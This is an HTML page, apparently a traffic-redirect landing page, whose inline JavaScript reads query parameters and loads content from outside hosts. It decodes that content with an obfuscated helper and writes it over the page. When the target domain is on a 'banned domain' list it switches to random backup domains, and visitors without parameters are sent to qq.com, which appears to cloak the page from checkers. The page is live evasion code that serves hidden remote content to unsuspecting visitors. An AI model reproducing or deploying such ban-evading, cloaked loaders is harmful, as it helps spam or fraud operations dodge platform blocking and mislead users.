<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body id="show_content">
<!--js base64加密-->
<script type="text/javascript" src="https://static-other.artgeek.com.cn/Common/Js/JGJHGKuytFJHGHKHJ.js"></script>
<!-- 检测域名是否被封 -->
<script type="text/javascript" src="https://static-other.artgeek.com.cn/Temp/Kouling/dieDomain.js"></script>
<script type = "text/javascript" >
    document.getElementsByTagName("body")[0].innerHTML == "";
    function loadhtml(s) {
        document.title = "...";
        var t = new XMLHttpRequest;
        var r = null;
        function u() {
            var w = document.open("text/html", "replace");
            var v = r.substring(0, 3);
            w.write(_d(r, v));
            w.close()
        }
        t.onload = function() {
            r = t.responseText;
            var v = 0;
            if (v > 0) {
                setTimeout("render()", v * 1000)
            } else {
                u()
            }
        };
        t.open("GET", s, !0);
        t.send()
    }
    function getQueryVariable(s) {
        var v = window.location.search.substring(1);
        var u = v.split("&");
        for (var r = 0; r < u.length; r++) {
            var t = u[r].split("=");
            if (t[0] == s) {
                return t[1]
            }
        }
        return (false)
    }
    var c = getQueryVariable("locationurl");
    var n = getQueryVariable("dotype");
    var h = getQueryVariable("p");
    var d = getQueryVariable("server");
    if (n != false || h != false) {
        var p = getQueryVariable("u");
        var j = (new Date()).getTime();
        var m = getQueryVariable("tomen");
        var f = window.location.host;
        loadhtml("https://www.kiddi.com.cn/index.php/Home/Htmlcode/LuodiHtml/u/" + p + "/p/" + h + "/domain/" + f + "/shatype/" + j + "/tomen/" + m)
    } else {
        var j = (new Date()).getTime();
        if (c != false) {
            var l = c.substr(0, 4);
            if (l == "http") {
                var d1 = c.split("//");
                var d2 = d1[1].split("/");
                var d3 = d2[0].split(".");
                var code1 = d1[1].split("php");
                var dp = d3[2] + "." + d3[3];
                if (d3[4] != undefined) {
                    dp = dp + "." + d3[4]
                }
                if (d3[5] != undefined) {
                    dp = dp + "." + d3[5]
                }
                if (d3[6] != undefined) {
                    dp = dp + "." + d3[6]
                }
                if (diedomian.indexOf(dp) != -1) {
                    var codekey = randomNum(0, backupdomain.length);
                    var gatedomain = backupdomain[codekey];
                    var c = "http://" + j + "." + gatedomain + "/" + j + ".php" + code1[1]
                }
                window.location.href = c
            } else {
                var e = c.split("laotie666");
                if (switchoff == 1) {
                    var g = e[0].split(".");
                    var dp = g[2] + "." + g[3];
                    if (g[4] != undefined) {
                        dp = dp + "." + g[4]
                    }
                    if (g[5] != undefined) {
                        dp = dp + "." + g[5]
                    }
                    if (g[6] != undefined) {
                        dp = dp + "." + g[6]
                    }
                    if (diedomian.indexOf(dp) != -1) {
                        var codekey = randomNum(0, backupdomain.length);
                        var gatedomain = backupdomain[codekey];
                        var a = "http://" + j + "." + gatedomain + "/" + j + ".php/code/" + e[1] + "/type/" + e[1]
                    } else {
                        var a = "http://" + e[0] + "/" + j + ".php/code/" + e[1] + "/type/" + e[1]
                    }
                } else {
                    var a = "http://" + e[0] + "/" + j + ".php/code/" + e[1] + "/type/" + e[1]
                }
                window.location.href = a
            }
        } else {
            if (d != false) {
                var b = getQueryVariable("linkcode");
                var i = getQueryVariable("userinfo");
                var o = getQueryVariable("fangs");
                var q = getQueryVariable("middle");
                var k = document.referrer;
                var g = k.split("/");
                loadhtml("https://1007ssl.chenpeipei.cn/index.php/Home/Article/showinfo/code/" + b + "/userinfo/" + i + "/server/" + d + "/domain/" + g[2] + "/fangs/" + o + "/middle/" + q)
            } else {
                window.location.href = "https://www.qq.com"
            }
        }
    }
    function randomNum(s, r) {
        switch (arguments.length) {
            case 1:
                return parseInt(Math.random() * s + 1, 10);
                break;
            case 2:
                return parseInt(Math.random() * (r - s + 1) + s, 10);
                break;
            default:
                return 0;
                break
        }
    };
</script>
</body>
</html>